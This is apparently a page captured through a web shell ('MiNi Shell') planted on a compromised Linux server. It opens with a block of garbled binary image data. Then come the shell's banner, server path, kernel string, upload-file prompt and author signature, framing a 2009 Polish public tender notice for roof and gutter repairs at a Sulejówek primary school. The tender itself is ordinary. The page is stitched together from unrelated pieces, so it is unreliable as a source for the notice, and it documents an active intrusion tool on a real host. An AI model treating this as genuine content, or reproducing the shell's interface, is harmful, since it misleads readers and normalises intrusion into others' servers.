JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090727/120887-N-2009.html

<p class="kh_header"><b>Sulejówek: Wymiana obróbek blacharskich, rynien, konserwacyjne malowanie połaci dachowych z robotami towarzyszącymi - budynekD Szkoły Podstawowej Nr 3 w Sulejówku</b><br>
<b>Numer ogłoszenia: 120887 - 2009; data zamieszczenia: 27.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 3 im. Marszałka Józefa Piłsudskiego , ul. Głowackiego 47, 05-071 Sulejówek, woj. mazowieckie, tel. 022 7835019, faks 022 7835500.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp3sulejowek.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana obróbek blacharskich, rynien, konserwacyjne malowanie połaci dachowych z robotami towarzyszącymi - budynekD Szkoły Podstawowej Nr 3 w Sulejówku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymiana obróbek blacharskich, rynien, konserwacyjne malowanie połaci dachowych z robotami towarzyszącymi- budynekD Szkoły Podstawowej Nr 3 w Sulejówku.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.55.00-2, 45.45.30.00-7, 45.44.21.00-8, 45.26.12.21-9, 45.26.13.20-3, 45.26.19.10-6, 45.26.19.20-9, 45.31.42.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.000 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
1/ posiadają uprawnienia do wykonywania określonej działalności lub czynności,     
    jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2/ znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
    zamówienia,
3/ dysponują potencjałem technicznym i osobami zdolnymi do wykonywania   
    zamówienia, tj. posiadajacymi niezbędne uprawnienia budowlane w specjalności 
    ogólno-budowlanej, do pełnienia samodzielnych funkcji technicznych w  
    budownictwie w budownictwie - co najmniej 1 osoba, lub przedstawią pisemne 
    zobowiązanie innych podmiotów do udostępnienia osób zdolnych do  
    wykonywania zamówienia,
4/ posiadają niezbędną wiedzę i doświadczenie przy realizacji robót objętych 
    przedmiotem zamówienia, tj. robót ogólnobudowlanych lub robót remontowych  
    ogólnobudowlanych, w okresie ostatnich pięciu lat przed dniem wszczęcia 
    postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności    
    jest krótszy - w tym okesie, co najmiej dwóch zadań o wartości nie mniejszej 
    niż 100 tys. złotych każde,

5/ nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:

Komisja przetargowa dokona sprwdzenia ofert pod względem formalno-prawnym i kompletności ofert.Spełnienie warunków udziału w postępowaniu zostanie ocenione według zasady spełnia/nie spełnia na podstawie załączonych dokumentów. Wykonawcy nie spełniąjacy warunków udziału w postępowaniu zostaną wykluczeni, a ich oferty zostaną uznzne za odrzucone. Oferty nie spełniające wymogów SIWZ zostaną odrzucone na podstawie art. 89 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia przez wykonawców wymaganych warunków udziału w postępowaniu, wykonawcy winny złożyć następujące dokumenty lub poświadczone za zgodność z oryginałem ich odpisy lub kserokopie:

Oferta / zgodna w treści z formularzem stanowiącym załącznik nr1 do SIWZ/ wraz z załącznikami, w tym:
1/ aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  
    ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
    rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie 
    wcześniej niż 6 miesięcy przed upływem terminu składania ofert- załącznik Nr1 
    do formularza oferty,
2/ oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 ustawy z dnia 
    29 stycznia 2004r.Prawo Zamówień Publicznych - załącznik Nr2 do formularza 
    oferty,
3/ wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem 
    wszczęcia postępowania o udzielenie zamówienia, co najmniej dwóch zamówień 
    obejmujących wykonanie robót ogólnobudowlanych lub robót remontowych 
    ogólnobudowlanych i o wartości mniejszej niż. 100 tyś. zł. każde, a jeżeli okres 
    prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości 
    oraz daty i miejsca wykonania oraz załączeniem dokumentów 
    potwierdzajączych, że roboty te zostały wykonane należycie- wg wzoru 
    stanowiącego załącznik Nr3 do formularza oferty,
4/ wykaz osób i podmiotów które będą uczestniczyć w wykonywaniu zamówienia- 
    wg wzoru stanowiącego załącznik Nr 4 do formularza oferty, wraz z informacjami 
    na temat ich kawlifikacji zawodowych niezbędnymi do wykonania zamówienia, a 
    także zakresu wykonywanych przez nich czynności wraz z załączeniem 
    dokumentów potwierdzających posiadane przez te osoby uprawnienia 
    budowlane w specjalności ogólnobudowlanej do pełnienia samodzielnych funkcji 
    w budownictwie, co najmniej 1 osoba, oraz aktualne zaświadczenia z 
    właściwych izb samorządu zawodowego,
5/ kopia dowodu wniesienia wadium - załącznik Nr5 do formularza oferty,
6/ kosztorys ofertowy w wersji szczegółowej - załącznik Nr6 do formularza oferty
7/ aktualne zaświadczenie właściwego Urzędu Skarbowego oraz właściwego 
    oddziału Zakładu Ubezpieczeń Społecznych potwiertdzające odpowiednio, że 
    Wykonawca nie zalega z opłacenien podatków, opłat oraz składek na 
    ubezpieczenie zdrowotne lub społeczne lub zaświadczenia, że uzyskał 
    przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
    płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - 
    wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert -    załączniki Nr 6 i 7 do formularza ofertowego.
8/ wykaz części zamówienia, których wykonanie Wykonawca zamierza powierzyć 
    podwykonawcom..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> - www.bip.sulejowek.pl, www.sp3sulejowek.republika.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa Nr 3  ul. Głowackiego 47, 05-071 Sulejówek sekretariat szkoły - pokój nr 1..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2009 godzina 12:00, miejsce: Sekretariat Szkoły Podstawowej Nr 3 w Sulejówku,
ul. Głowackiego 47, 05-071 Sulejówek.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com